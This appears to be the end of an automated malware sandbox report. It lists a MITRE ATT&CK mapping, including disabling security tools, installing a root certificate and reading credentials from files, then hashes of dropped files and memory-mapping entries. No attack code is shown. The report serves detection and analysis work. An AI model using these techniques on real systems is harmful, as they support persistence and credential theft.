                                                                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:1736

                                                                                                                                                                    Network

                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                    Execution

                                                                                                                                                                    Scheduled Task

                                                                                                                                                                    1
                                                                                                                                                                    T1053

                                                                                                                                                                    Persistence

                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                    1
                                                                                                                                                                    T1060

                                                                                                                                                                    Browser Extensions

                                                                                                                                                                    1
                                                                                                                                                                    T1176

                                                                                                                                                                    Scheduled Task

                                                                                                                                                                    1
                                                                                                                                                                    T1053

                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                    Scheduled Task

                                                                                                                                                                    1
                                                                                                                                                                    T1053

                                                                                                                                                                    Defense Evasion

                                                                                                                                                                    Disabling Security Tools

                                                                                                                                                                    1
                                                                                                                                                                    T1089

                                                                                                                                                                    Modify Registry

                                                                                                                                                                    4
                                                                                                                                                                    T1112

                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                    1
                                                                                                                                                                    T1130

                                                                                                                                                                    Credential Access

                                                                                                                                                                    Credentials in Files

                                                                                                                                                                    1
                                                                                                                                                                    T1081

                                                                                                                                                                    Discovery

                                                                                                                                                                    Query Registry

                                                                                                                                                                    1
                                                                                                                                                                    T1012

                                                                                                                                                                    System Information Discovery

                                                                                                                                                                    1
                                                                                                                                                                    T1082

                                                                                                                                                                    Collection

                                                                                                                                                                    Data from Local System

                                                                                                                                                                    1
                                                                                                                                                                    T1005

                                                                                                                                                                    Replay Monitor

                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                    Downloads

                                                                                                                                                                    • C:\Program Files (x86)\BsZkTgYBU\ysWCLVm.xml
                                                                                                                                                                      MD5

                                                                                                                                                                      1ccb6c47044f11577d6bc49b57db71a8

                                                                                                                                                                      SHA1

                                                                                                                                                                      3625d8a9ed3767f340f5d930fb50ca5037e88f64

                                                                                                                                                                      SHA256

                                                                                                                                                                      ad5a88fcb180ee1ac6a0e123324cea512d041f583da8446e14addaf1cfb3fafa

                                                                                                                                                                      SHA512

                                                                                                                                                                      522b5a626510857549ec0dbab6e2273c01dfd3bf17110cf97c4b8f5a761d4fe3d7d3a84501b449197ad42e03795a8ec07644e77d8ad56494f0e5960a304c3671

                                                                                                                                                                    • C:\Program Files (x86)\CzYifeKYfmykC\vASYnsA.xml
                                                                                                                                                                      MD5

                                                                                                                                                                      054d925aff236e0d4ab55c74469fb477

                                                                                                                                                                      SHA1

                                                                                                                                                                      546a0f4d297e2e95b4df93220f8e7c25e91bdc8a

                                                                                                                                                                      SHA256

                                                                                                                                                                      36012aef2095c4efd667e0713eea0e43a7a0bad36fe8778a0579d02d8a63cb06

                                                                                                                                                                      SHA512

                                                                                                                                                                      6e5b598c8bcbd8d1f82cc365a73a57a1a5033368549ecbeaa1cd3147d6fe65eed9487efbab38397e1a45f980cc031187e9f3a11bc429dea41df11251e4f72a31

                                                                                                                                                                    • C:\Program Files (x86)\HJbvTEnmUxKU2\vlAJldP.xml
                                                                                                                                                                      MD5

                                                                                                                                                                      7bfb9625778b859257c7f7ff2459c458

                                                                                                                                                                      SHA1

                                                                                                                                                                      6193aca803074d179aebdb94f7ee93423add1719

                                                                                                                                                                      SHA256

                                                                                                                                                                      ae93d68bf92163baa5d5f75468b722b82c5989e9446bb19306ef2779d665782b

                                                                                                                                                                      SHA512

                                                                                                                                                                      c43a369634b02aa82ec40042682ffcd39c18193b1673aef2d50ce7d353c3805f7c3b9bd0f20ac5dd5433f843aeddcef9d7f149905f7e5901d017c70d97efc51a

                                                                                                                                                                    • C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR\HOOCTKh.xml
                                                                                                                                                                      MD5

                                                                                                                                                                      13d6c155f77d4b4f8c747dede86dee45

                                                                                                                                                                      SHA1

                                                                                                                                                                      269afbe52432a785c8d1acd6752b112cba7c1a3c

                                                                                                                                                                      SHA256

                                                                                                                                                                      0dd9eac573790675add4fc09a4802c0f25f75074df2fc0d50c5bd4ade383cc03

                                                                                                                                                                      SHA512

                                                                                                                                                                      da15af0d015e2a51a2f632230fd36afdc745a5c31d9d5672fca6a695998f38049b4e664285c7ea35662657f4464fdaeba8178a1ef6391fb66a07ba011b6ecfe3

                                                                                                                                                                    • C:\ProgramData\ehtkUBLERmscXYVB\hqzsGty.xml
                                                                                                                                                                      MD5

                                                                                                                                                                      41eff7d4e6bc7323ad6f4775f9ba45ee

                                                                                                                                                                      SHA1

                                                                                                                                                                      d5395e40893153fca810752b22c71fc14a60c74b

                                                                                                                                                                      SHA256

                                                                                                                                                                      37b494f7d3f60db37c2511f643f71253df49fe791d9c099953bb6053686e6c90

                                                                                                                                                                      SHA512

                                                                                                                                                                      2374fbb81b456098405fdbf4557fe96c6922c324f0084e6839d7a1d203c0e305eda0b3ee98309ee9cd4af96f1f89500af4d5619a2c55a851c78b4e6bf3fb51d0

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\XDiMVUwYizJKBFrs\nPeHffteYySCvLPa.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      24aaaf51a83907c21f3dc68ecc49aba6

                                                                                                                                                                      SHA1

                                                                                                                                                                      8d7c0773849e541fb8f8d04ca5911116a60ff24d

                                                                                                                                                                      SHA256

                                                                                                                                                                      75c08a6ebd94c602a9fae5e4a39a6d15c25906b9531d078d34be94b49192a546

                                                                                                                                                                      SHA512

                                                                                                                                                                      d489c85d9061fd49ca20046b72518796608f8148acc2d0bbd4dda3572d9a75c60bd0b1b461b41d316e527403cdd348d4f6f1db8b8839d78ed99fa3d2a33d30e0

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\XDiMVUwYizJKBFrs\nPeHffteYySCvLPa.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      24aaaf51a83907c21f3dc68ecc49aba6

                                                                                                                                                                      SHA1

                                                                                                                                                                      8d7c0773849e541fb8f8d04ca5911116a60ff24d

                                                                                                                                                                      SHA256

                                                                                                                                                                      75c08a6ebd94c602a9fae5e4a39a6d15c25906b9531d078d34be94b49192a546

                                                                                                                                                                      SHA512

                                                                                                                                                                      d489c85d9061fd49ca20046b72518796608f8148acc2d0bbd4dda3572d9a75c60bd0b1b461b41d316e527403cdd348d4f6f1db8b8839d78ed99fa3d2a33d30e0

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ\xOmHDUPj\dLVvBvq.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      24aaaf51a83907c21f3dc68ecc49aba6

                                                                                                                                                                      SHA1

                                                                                                                                                                      8d7c0773849e541fb8f8d04ca5911116a60ff24d

                                                                                                                                                                      SHA256

                                                                                                                                                                      75c08a6ebd94c602a9fae5e4a39a6d15c25906b9531d078d34be94b49192a546

                                                                                                                                                                      SHA512

                                                                                                                                                                      d489c85d9061fd49ca20046b72518796608f8148acc2d0bbd4dda3572d9a75c60bd0b1b461b41d316e527403cdd348d4f6f1db8b8839d78ed99fa3d2a33d30e0

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ\xOmHDUPj\dLVvBvq.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      24aaaf51a83907c21f3dc68ecc49aba6

                                                                                                                                                                      SHA1

                                                                                                                                                                      8d7c0773849e541fb8f8d04ca5911116a60ff24d

                                                                                                                                                                      SHA256

                                                                                                                                                                      75c08a6ebd94c602a9fae5e4a39a6d15c25906b9531d078d34be94b49192a546

                                                                                                                                                                      SHA512

                                                                                                                                                                      d489c85d9061fd49ca20046b72518796608f8148acc2d0bbd4dda3572d9a75c60bd0b1b461b41d316e527403cdd348d4f6f1db8b8839d78ed99fa3d2a33d30e0

                                                                                                                                                                    • C:\Windows\Temp\mXZOChzNWSbPIDPW\ToHdTqvg\KgMrcGGPuAWwFXOa.wsf
                                                                                                                                                                      MD5

                                                                                                                                                                      c52211a3e078ca8c54c40e33a3b78161

                                                                                                                                                                      SHA1

                                                                                                                                                                      2bae286707f438513179d578756e13da19f84f3c

                                                                                                                                                                      SHA256

                                                                                                                                                                      9cb8fad1c7f3547c78b55114db05cc2c898ed4bf4d0e0f19b708956f9875152f

                                                                                                                                                                      SHA512

                                                                                                                                                                      8ee5faac270f091d9b955e5bac778890283360d98e798ad216f589d71823df0c07037ecdb71740d062435b0b962b699cc3f38f1d3604318f4d7543942ce54d4d

                                                                                                                                                                    • \Users\Admin\AppData\Local\Temp\XDiMVUwYizJKBFrs\nPeHffteYySCvLPa.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      24aaaf51a83907c21f3dc68ecc49aba6

                                                                                                                                                                      SHA1

                                                                                                                                                                      8d7c0773849e541fb8f8d04ca5911116a60ff24d

                                                                                                                                                                      SHA256

                                                                                                                                                                      75c08a6ebd94c602a9fae5e4a39a6d15c25906b9531d078d34be94b49192a546

                                                                                                                                                                      SHA512

                                                                                                                                                                      d489c85d9061fd49ca20046b72518796608f8148acc2d0bbd4dda3572d9a75c60bd0b1b461b41d316e527403cdd348d4f6f1db8b8839d78ed99fa3d2a33d30e0

                                                                                                                                                                    • \Users\Admin\AppData\Local\Temp\XDiMVUwYizJKBFrs\nPeHffteYySCvLPa.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      24aaaf51a83907c21f3dc68ecc49aba6

                                                                                                                                                                      SHA1

                                                                                                                                                                      8d7c0773849e541fb8f8d04ca5911116a60ff24d

                                                                                                                                                                      SHA256

                                                                                                                                                                      75c08a6ebd94c602a9fae5e4a39a6d15c25906b9531d078d34be94b49192a546

                                                                                                                                                                      SHA512

                                                                                                                                                                      d489c85d9061fd49ca20046b72518796608f8148acc2d0bbd4dda3572d9a75c60bd0b1b461b41d316e527403cdd348d4f6f1db8b8839d78ed99fa3d2a33d30e0

                                                                                                                                                                    • memory/304-66-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/308-20-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/316-84-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/436-34-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/436-68-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/548-61-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/608-37-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/608-72-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/616-102-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/616-31-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/664-50-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/668-26-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/668-74-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/668-8-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/740-89-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/744-93-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/744-54-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/780-27-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/780-69-0x0000000002880000-0x0000000002884000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      16KB

                                                                                                                                                                    • memory/788-73-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/792-96-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/812-52-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/824-4-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/824-110-0x0000000002EE0000-0x0000000002F48000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      416KB

                                                                                                                                                                    • memory/824-6-0x0000000010000000-0x0000000010586000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      5.5MB

                                                                                                                                                                    • memory/824-97-0x0000000003520000-0x00000000035A5000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      532KB

                                                                                                                                                                    • memory/828-56-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/860-78-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/888-65-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/904-118-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/904-21-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/904-59-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/904-98-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/936-23-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/940-48-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/968-88-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/968-39-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/972-22-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/980-15-0x000000001B4F0000-0x000000001B4F1000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      4KB

                                                                                                                                                                    • memory/980-14-0x0000000002520000-0x0000000002521000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      4KB

                                                                                                                                                                    • memory/980-10-0x000007FEF58B0000-0x000007FEF629C000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      9.9MB

                                                                                                                                                                    • memory/980-12-0x000000001AB30000-0x000000001AB31000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      4KB

                                                                                                                                                                    • memory/980-13-0x000000001AA30000-0x000000001AA31000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      4KB

                                                                                                                                                                    • memory/980-9-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/980-11-0x00000000023E0000-0x00000000023E1000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      4KB

                                                                                                                                                                    • memory/996-18-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/996-71-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1020-104-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1020-90-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1036-25-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1064-55-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1112-51-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1132-0-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1156-49-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1160-77-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1188-17-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1260-47-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1260-85-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1264-45-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1264-70-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1296-100-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1296-60-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1308-67-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1320-95-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1324-94-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1328-1-0x000007FEF7F80000-0x000007FEF81FA000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      2.5MB

                                                                                                                                                                    • memory/1344-57-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1348-83-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1368-112-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1368-80-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1372-43-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1388-30-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1400-108-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1400-92-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1400-64-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1488-101-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1532-79-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1540-87-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1540-7-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1540-119-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1540-24-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1544-35-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1548-115-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1608-32-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1632-29-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1632-53-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1648-19-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1652-58-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1672-62-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1672-76-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1704-86-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1708-36-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1756-33-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1764-82-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1848-38-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1848-91-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1848-63-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1852-106-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1852-41-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1880-44-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1920-46-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1976-42-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1980-16-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/1984-75-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/2024-113-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/2024-81-0x0000000000000000-mapping.dmp
                                                                                                                                                                    • memory/2040-40-0x0000000000000000-mapping.dmp